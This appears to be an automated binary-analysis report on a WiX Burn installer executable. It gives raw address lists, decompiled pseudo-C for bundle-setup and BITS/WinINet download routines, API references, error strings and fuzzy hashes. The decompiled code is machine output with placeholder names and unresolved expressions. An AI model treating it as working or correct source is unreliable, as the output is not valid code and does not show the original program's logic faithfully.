                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230ef
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230d2
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004230b3
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423075
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422fef
                                                                                                                                                                  0x00422e4a
                                                                                                                                                                  0x00422e4a
                                                                                                                                                                  0x00422e4f
                                                                                                                                                                  0x00422e58
                                                                                                                                                                  0x00422e63
                                                                                                                                                                  0x00422e66
                                                                                                                                                                  0x00422e69
                                                                                                                                                                  0x00422e6e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422e74
                                                                                                                                                                  0x00422e7e
                                                                                                                                                                  0x00422e84
                                                                                                                                                                  0x00422e86
                                                                                                                                                                  0x00422e8c
                                                                                                                                                                  0x00422e92
                                                                                                                                                                  0x00422ea7
                                                                                                                                                                  0x00422eab
                                                                                                                                                                  0x00423039
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422eb1
                                                                                                                                                                  0x00422ecd
                                                                                                                                                                  0x00422ed1
                                                                                                                                                                  0x0042302f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422ed7
                                                                                                                                                                  0x00422ef3
                                                                                                                                                                  0x00422ef7
                                                                                                                                                                  0x00423025
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422efd
                                                                                                                                                                  0x00422efd
                                                                                                                                                                  0x00422f00
                                                                                                                                                                  0x00422f06
                                                                                                                                                                  0x00422f2c
                                                                                                                                                                  0x00422f2c
                                                                                                                                                                  0x00422f32
                                                                                                                                                                  0x00422f7e
                                                                                                                                                                  0x00422f7e
                                                                                                                                                                  0x00422f81
                                                                                                                                                                  0x00422f87
                                                                                                                                                                  0x00422f8b
                                                                                                                                                                  0x00422f8c
                                                                                                                                                                  0x00422f95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f34
                                                                                                                                                                  0x00422f39
                                                                                                                                                                  0x00422f41
                                                                                                                                                                  0x00422f47
                                                                                                                                                                  0x00422f4a
                                                                                                                                                                  0x00422f4d
                                                                                                                                                                  0x00422f54
                                                                                                                                                                  0x00423003
                                                                                                                                                                  0x00423013
                                                                                                                                                                  0x00423015
                                                                                                                                                                  0x0042301a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f5a
                                                                                                                                                                  0x00422f5f
                                                                                                                                                                  0x00422f76
                                                                                                                                                                  0x00422f7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f7b
                                                                                                                                                                  0x00422f54
                                                                                                                                                                  0x00422f08
                                                                                                                                                                  0x00422f1f
                                                                                                                                                                  0x00422f23
                                                                                                                                                                  0x00422ff9
                                                                                                                                                                  0x0042311b
                                                                                                                                                                  0x0042311b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422f29
                                                                                                                                                                  0x00422f23
                                                                                                                                                                  0x00422f06
                                                                                                                                                                  0x00422ef7
                                                                                                                                                                  0x00422ed1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422eab
                                                                                                                                                                  0x00423043
                                                                                                                                                                  0x00423053
                                                                                                                                                                  0x00423055
                                                                                                                                                                  0x0042305a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042305a
                                                                                                                                                                  0x00422e0c
                                                                                                                                                                  0x00422e0c
                                                                                                                                                                  0x00422e1c
                                                                                                                                                                  0x00422e1e
                                                                                                                                                                  0x00422e23
                                                                                                                                                                  0x0042301f
                                                                                                                                                                  0x0042301f
                                                                                                                                                                  0x0042311c
                                                                                                                                                                  0x0042311c
                                                                                                                                                                  0x00423122
                                                                                                                                                                  0x0042312c
                                                                                                                                                                  0x00423130
                                                                                                                                                                  0x00423135
                                                                                                                                                                  0x00423135
                                                                                                                                                                  0x00423140

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle payload., xrefs: 00423039
                                                                                                                                                                  • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 00422E23
                                                                                                                                                                  • pseudobundle.cpp, xrefs: 00422E17, 0042300E, 0042304E
                                                                                                                                                                  • Failed to copy download source for passthrough pseudo bundle., xrefs: 00422FF9
                                                                                                                                                                  • Failed to copy related arguments for passthrough bundle package, xrefs: 004230EF
                                                                                                                                                                  • Failed to copy local source path for passthrough pseudo bundle., xrefs: 00423025
                                                                                                                                                                  • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 00423116
                                                                                                                                                                  • Failed to copy filename for passthrough pseudo bundle., xrefs: 0042302F
                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0042305A
                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0042301A
                                                                                                                                                                  • Failed to copy cache id for passthrough pseudo bundle., xrefs: 00423075
                                                                                                                                                                  • Failed to copy install arguments for passthrough bundle package, xrefs: 004230D2
                                                                                                                                                                  • Failed to recreate command-line arguments., xrefs: 004230B3
                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle., xrefs: 00422FEF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                  • API String ID: 1617791916-115096447
                                                                                                                                                                  • Opcode ID: e10a3cb1ffaf961182af13acff6fb8a5286bea6ff330845449bcc651a40e2e58
                                                                                                                                                                  • Instruction ID: 092d0e0dfaecddaf412aebfac507c950904cc4396fa7d777170af1d30e108291
                                                                                                                                                                  • Opcode Fuzzy Hash: e10a3cb1ffaf961182af13acff6fb8a5286bea6ff330845449bcc651a40e2e58
                                                                                                                                                                  • Instruction Fuzzy Hash: C5B15635B00625EFDB11CF28C881F59BBB1BB08315F51815AF904AB3A2C779ED61DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E00426408(void* __edx, intOrPtr _a4, WCHAR** _a8, intOrPtr _a12) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                                                  				short _t84;
                                                                                                                                                                  				short _t85;
                                                                                                                                                                  				short _t86;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				intOrPtr* _t97;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				WCHAR** _t102;
                                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                                  
                                                                                                                                                                  				_t95 = __edx;
                                                                                                                                                                  				_t96 = _a8;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t83 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				if(lstrlenW( *_a8) >= 8) {
                                                                                                                                                                  					_t99 = E00433F88( &_v8,  *_t96, 0);
                                                                                                                                                                  					if(_t99 >= 0) {
                                                                                                                                                                  						_t84 = 0x68;
                                                                                                                                                                  						 *_v8 = _t84;
                                                                                                                                                                  						_t85 = 0x74;
                                                                                                                                                                  						 *((short*)(_v8 + 2)) = _t85;
                                                                                                                                                                  						 *((short*)(_v8 + 4)) = _t85;
                                                                                                                                                                  						_t86 = 0x70;
                                                                                                                                                                  						 *((short*)(_v8 + 6)) = _t86;
                                                                                                                                                                  						_t51 = E00425F1D(_t95,  &_v16);
                                                                                                                                                                  						_t97 = _v16;
                                                                                                                                                                  						if(_t51 >= 0) {
                                                                                                                                                                  							if(E004262DE(_t97, _a8[1], _a8[2]) >= 0) {
                                                                                                                                                                  								_t102 =  *((intOrPtr*)( *_t97 + 0x10))(_t97, _v8, _a12);
                                                                                                                                                                  								_a8 = _t102;
                                                                                                                                                                  								if(_t102 >= 0) {
                                                                                                                                                                  									if(E00428F67(0x30) == 0) {
                                                                                                                                                                  										_t83 = 0;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t56 = E00425E55(_t56, _a4,  &_a8);
                                                                                                                                                                  										_t102 = _a8;
                                                                                                                                                                  										_t83 = _t56;
                                                                                                                                                                  									}
                                                                                                                                                                  									if(_t83 != 0) {
                                                                                                                                                                  										if(_t102 >= 0) {
                                                                                                                                                                  											_t103 =  *((intOrPtr*)( *_t97 + 0x64))(_t97, _t83);
                                                                                                                                                                  											if(_t103 >= 0) {
                                                                                                                                                                  												while(1) {
                                                                                                                                                                  													_v12 = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t83 + 0x24)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t83 + 0x20)) = 0;
                                                                                                                                                                  													ResetEvent( *(_t83 + 0x28));
                                                                                                                                                                  													_t103 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                                                                                                                                                  													if(_t103 < 0) {
                                                                                                                                                                  														break;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t90 = _t83;
                                                                                                                                                                  													_t103 = E00426382(_t83);
                                                                                                                                                                  													if(_t103 < 0) {
                                                                                                                                                                  														_push("Failed while waiting for BITS download.");
                                                                                                                                                                  														goto L31;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t103 =  *((intOrPtr*)(_t83 + 0x24));
                                                                                                                                                                  													if(_t103 == 0x80070642) {
                                                                                                                                                                  														goto L32;
                                                                                                                                                                  													}
                                                                                                                                                                  													if(_t103 < 0) {
                                                                                                                                                                  														E004261F2(_t90, _t103, _a4, _t97, _t103,  *((intOrPtr*)(_t83 + 0x20)),  &_v12);
                                                                                                                                                                  													}
                                                                                                                                                                  													if(_v12 != 0) {
                                                                                                                                                                  														continue;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														if(_t103 >= 0) {
                                                                                                                                                                  															_t103 =  *((intOrPtr*)( *_t97 + 0x24))(_t97);
                                                                                                                                                                  															if(_t103 >= 0) {
                                                                                                                                                                  																goto L32;
                                                                                                                                                                  															}
                                                                                                                                                                  															_push("Failed to complete BITS job.");
                                                                                                                                                                  															goto L31;
                                                                                                                                                                  														}
                                                                                                                                                                  														_push("Failed to download BITS job.");
                                                                                                                                                                  														goto L31;
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Falied to start BITS job.");
                                                                                                                                                                  												goto L31;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to set callback interface for BITS job.");
                                                                                                                                                                  											goto L31;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to initialize BITS job callback.");
                                                                                                                                                                  										goto L31;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t103 = 0x8007000e;
                                                                                                                                                                  										E004300D9(_t56, "bitsengine.cpp", 0x14c, 0x8007000e);
                                                                                                                                                                  										_push("Failed to create BITS job callback.");
                                                                                                                                                                  										L31:
                                                                                                                                                                  										_push(_t103);
                                                                                                                                                                  										E00430A57();
                                                                                                                                                                  										L32:
                                                                                                                                                                  										if(_t97 != 0) {
                                                                                                                                                                  											 *((intOrPtr*)( *_t97 + 0x64))(_t97, 0);
                                                                                                                                                                  											if(_t103 < 0) {
                                                                                                                                                                  												 *((intOrPtr*)( *_t97 + 0x20))(_t97);
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  										if(_t83 != 0) {
                                                                                                                                                                  											 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                                                                                                                                  										}
                                                                                                                                                                  										if(_t97 != 0) {
                                                                                                                                                                  											 *((intOrPtr*)( *_t97 + 8))(_t97);
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L39;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to add file to BITS job.");
                                                                                                                                                                  								goto L31;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to set credentials for BITS job.");
                                                                                                                                                                  							goto L31;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to create BITS job.");
                                                                                                                                                                  						goto L31;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to copy download URL.");
                                                                                                                                                                  					_push(_t99);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					goto L39;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t103 = 0x80070057;
                                                                                                                                                                  					E004300D9(_t43, "bitsengine.cpp", 0x134, 0x80070057);
                                                                                                                                                                  					E00430A57(0x80070057, "Invalid BITS engine URL: %ls",  *_t96);
                                                                                                                                                                  					L39:
                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                  						E004380AB(_v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t103;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

















                                                                                                                                                                  0x00426559
                                                                                                                                                                  0x00426562
                                                                                                                                                                  0x00426564
                                                                                                                                                                  0x0042656a
                                                                                                                                                                  0x0042656d
                                                                                                                                                                  0x00426570
                                                                                                                                                                  0x0042657c
                                                                                                                                                                  0x00426580
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426582
                                                                                                                                                                  0x00426589
                                                                                                                                                                  0x0042658d
                                                                                                                                                                  0x004265d3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265d3
                                                                                                                                                                  0x0042658f
                                                                                                                                                                  0x00426598
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042659c
                                                                                                                                                                  0x004265aa
                                                                                                                                                                  0x004265aa
                                                                                                                                                                  0x004265b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265b5
                                                                                                                                                                  0x004265b7
                                                                                                                                                                  0x004265c6
                                                                                                                                                                  0x004265ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265cc
                                                                                                                                                                  0x004265b9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265b9
                                                                                                                                                                  0x004265b3
                                                                                                                                                                  0x004265da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004265da
                                                                                                                                                                  0x0042655b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042655b
                                                                                                                                                                  0x00426544
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426521
                                                                                                                                                                  0x00426521
                                                                                                                                                                  0x00426531
                                                                                                                                                                  0x00426536
                                                                                                                                                                  0x004265df
                                                                                                                                                                  0x004265df
                                                                                                                                                                  0x004265e0
                                                                                                                                                                  0x004265e7
                                                                                                                                                                  0x004265e9
                                                                                                                                                                  0x004265f0
                                                                                                                                                                  0x004265f5
                                                                                                                                                                  0x004265fa
                                                                                                                                                                  0x004265fa
                                                                                                                                                                  0x004265f5
                                                                                                                                                                  0x004265ff
                                                                                                                                                                  0x00426604
                                                                                                                                                                  0x00426604
                                                                                                                                                                  0x00426609
                                                                                                                                                                  0x0042660e
                                                                                                                                                                  0x0042660e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00426609
                                                                                                                                                                  0x0042651f
                                                                                                                                                                  0x004264f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264f0
                                                                                                                                                                  0x004264d1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264d1
                                                                                                                                                                  0x004264b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004264b2
                                                                                                                                                                  0x0042646a
                                                                                                                                                                  0x0042646f
                                                                                                                                                                  0x00426470
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042642e
                                                                                                                                                                  0x0042642e
                                                                                                                                                                  0x0042643e
                                                                                                                                                                  0x0042644b
                                                                                                                                                                  0x00426611
                                                                                                                                                                  0x00426615
                                                                                                                                                                  0x0042661a
                                                                                                                                                                  0x0042661a
                                                                                                                                                                  0x00426625
                                                                                                                                                                  0x00426625

APIs
• lstrlenW.KERNEL32(?,?,004201B3,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 00426423
Strings
• Failed to download BITS job., xrefs: 004265B9
• Failed to set callback interface for BITS job., xrefs: 0042655B
• Failed to copy download URL., xrefs: 0042646A
• Failed to add file to BITS job., xrefs: 004264F0
• Failed to set credentials for BITS job., xrefs: 004264D1
• Failed to complete BITS job., xrefs: 004265CC
• Failed to create BITS job callback., xrefs: 00426536
• Invalid BITS engine URL: %ls, xrefs: 00426445
• Failed to create BITS job., xrefs: 004264B2
• Failed to initialize BITS job callback., xrefs: 00426544
• Failed while waiting for BITS download., xrefs: 004265D3
• Falied to start BITS job., xrefs: 004265DA
• bitsengine.cpp, xrefs: 00426439, 0042652C
Memory Dump Source
• Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
• Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
• Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
• Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
• Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
Similarity
• API ID: lstrlen
• String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
• API String ID: 1659193697-2382896028
• Opcode ID: 16016408a7cb9dbdef7d256708e006ae799649f740fb7990378b6ec7117ee2b5
• Instruction ID: 515a0813f1598d88cce38c9a1c1ae97e94f9427ae093fa8052ebe463c40f0143
• Opcode Fuzzy Hash: 16016408a7cb9dbdef7d256708e006ae799649f740fb7990378b6ec7117ee2b5
• Instruction Fuzzy Hash: 7551A331B00235FBCB11AF55E885E5E7BA4AF08720F62415BFC04AB291DB7CDD419B99
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E004255EF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, WCHAR* _a32, WCHAR* _a36, void** _a40, void** _a44, intOrPtr _a48) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				WCHAR* _v24;
                                                                                                                                                                  				WCHAR* _v28;
                                                                                                                                                                  				short _v32;
                                                                                                                                                                  				WCHAR* _v36;
                                                                                                                                                                  				void _v40;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				WCHAR* _t49;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				signed short _t53;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				WCHAR* _t75;
                                                                                                                                                                  				signed int _t77;
                                                                                                                                                                  				WCHAR* _t81;
                                                                                                                                                                  				WCHAR* _t82;
                                                                                                                                                                  				void* _t85;
                                                                                                                                                                  				void* _t89;
                                                                                                                                                                  				void* _t90;
                                                                                                                                                                  				WCHAR* _t91;
                                                                                                                                                                  
                                                                                                                                                                  				_t89 = 0;
                                                                                                                                                                  				_t77 = 7;
                                                                                                                                                                  				_t74 = 0;
                                                                                                                                                                  				_t39 = memset( &_v40, 0, _t77 << 2);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t85 = _t39;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_v12 = _t89;
                                                                                                                                                                  					if(_t74 != 0) {
                                                                                                                                                                  						InternetCloseHandle(_t74);
                                                                                                                                                                  						_t74 = _t89;
                                                                                                                                                                  						_v8 = _t74;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t85 != 0) {
                                                                                                                                                                  						InternetCloseHandle(_t85);
                                                                                                                                                                  						_t85 = _t89;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t90 = E00438A49( *_a20,  &_v40);
                                                                                                                                                                  					if(_t90 < 0) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t91 = _a36;
                                                                                                                                                                  					if(_t91 == 0) {
                                                                                                                                                                  						L9:
                                                                                                                                                                  						_t82 = _v24;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t82 = _t91;
                                                                                                                                                                  						if( *_t91 == 0) {
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t49 = _a32;
                                                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                                                  						L12:
                                                                                                                                                                  						_t81 = _v28;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t81 = _t49;
                                                                                                                                                                  						if( *_t49 == 0) {
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_t50 = 3;
                                                                                                                                                                  					_t51 =  ==  ? 1 : _t50;
                                                                                                                                                                  					_t85 = InternetConnectW(_a16, _v36, _v32, _t81, _t82,  ==  ? 1 : _t50, ??, ??);
                                                                                                                                                                  					if(_t85 == 0) {
                                                                                                                                                                  						_t53 = GetLastError();
                                                                                                                                                                  						_t94 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t90 =  >=  ? 0x80004005 :  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "downloadengine.cpp", 0x216, _t90);
                                                                                                                                                                  						_push( *_a20);
                                                                                                                                                                  						_push("Failed to connect to URL: %ls");
                                                                                                                                                                  						goto L25;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t75 = _a32;
                                                                                                                                                                  						if(_t75 != 0 &&  *_t75 != 0 && _t91 != 0 &&  *_t91 != 0 && InternetSetOptionW(_t85, 0x2b, _t75, lstrlenW(_t75)) != 0) {
                                                                                                                                                                  							InternetSetOptionW(_t85, 0x2c, _t91, lstrlenW(_t91));
                                                                                                                                                                  						}
                                                                                                                                                                  						_t90 = E004257C9(_t81, _t85, _a24, _v40, _v20, _v16, _a28,  &_v8);
                                                                                                                                                                  						if(_t90 < 0) {
                                                                                                                                                                  							E00430A57(_t90, "Failed to open internet URL: %ls",  *_a20);
                                                                                                                                                                  							_t74 = _v8;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t74 = _v8;
                                                                                                                                                                  							_t90 = E00425909(_t81, _a4, _a8, _a12, _t74, _a20,  &_v12, _a48);
                                                                                                                                                                  							if(_t90 < 0) {
                                                                                                                                                                  								_push( *_a20);
                                                                                                                                                                  								_push("Failed to send request to URL: %ls");
                                                                                                                                                                  								L25:
                                                                                                                                                                  								_push(_t90);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  							} else {
                                                                                                                                                                  								if(_v12 != 0) {
                                                                                                                                                                  									_t89 = 0;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									 *_a40 = _t85;
                                                                                                                                                                  									_t85 = 0;
                                                                                                                                                                  									 *_a44 = _t74;
                                                                                                                                                                  									_t74 = 0;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					L29:
                                                                                                                                                                  					E00438A74( &_v40);
                                                                                                                                                                  					if(_t74 != 0) {
                                                                                                                                                                  						InternetCloseHandle(_t74);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t85 != 0) {
                                                                                                                                                                  						InternetCloseHandle(_t85);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t90;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to break URL into server and resource parts.");
                                                                                                                                                                  				_push(_t90);
                                                                                                                                                                  				E00430A57();
                                                                                                                                                                  				goto L29;
                                                                                                                                                                  			}


























                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00425617
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00425627
                                                                                                                                                                  • InternetConnectW.WININET(00000000,00000000,00000000,?,00000000,00000003,00000000,00000000), ref: 00425685
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004256AD
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000002B,?,00000000), ref: 004256BE
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004256C5
                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000002C,?,00000000), ref: 004256D0
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004257AF
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004257BA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to connect to URL: %ls, xrefs: 0042578D
                                                                                                                                                                  • Failed to open internet URL: %ls, xrefs: 00425747
                                                                                                                                                                  • Failed to send request to URL: %ls, xrefs: 00425732
                                                                                                                                                                  • downloadengine.cpp, xrefs: 0042577E
                                                                                                                                                                  • Failed to break URL into server and resource parts., xrefs: 00425794
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$Optionlstrlen$Connect
                                                                                                                                                                  • String ID: Failed to break URL into server and resource parts.$Failed to connect to URL: %ls$Failed to open internet URL: %ls$Failed to send request to URL: %ls$downloadengine.cpp
                                                                                                                                                                  • API String ID: 1145286777-2897276973
                                                                                                                                                                  • Opcode ID: 7646d53f9c6ffde3578474e344e6995eb564c30b84d47ac4c83e93a3dd0f81ca
                                                                                                                                                                  • Instruction ID: 454cca8ee1e62b51d527cee8f9c9373d960df165fe15c76356523d58fe9d2068
                                                                                                                                                                  • Opcode Fuzzy Hash: 7646d53f9c6ffde3578474e344e6995eb564c30b84d47ac4c83e93a3dd0f81ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 3051C532A00625EBDB129FD5AC84EAF77B9EF88740F51002AFD05A7250D739CD119BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                  			E0040EF74(void* __ebx, void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				void* _t23;
                                                                                                                                                                  				void* _t33;
                                                                                                                                                                  				long _t41;
                                                                                                                                                                  				long* _t42;
                                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				void* _t65;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t50 = _a4;
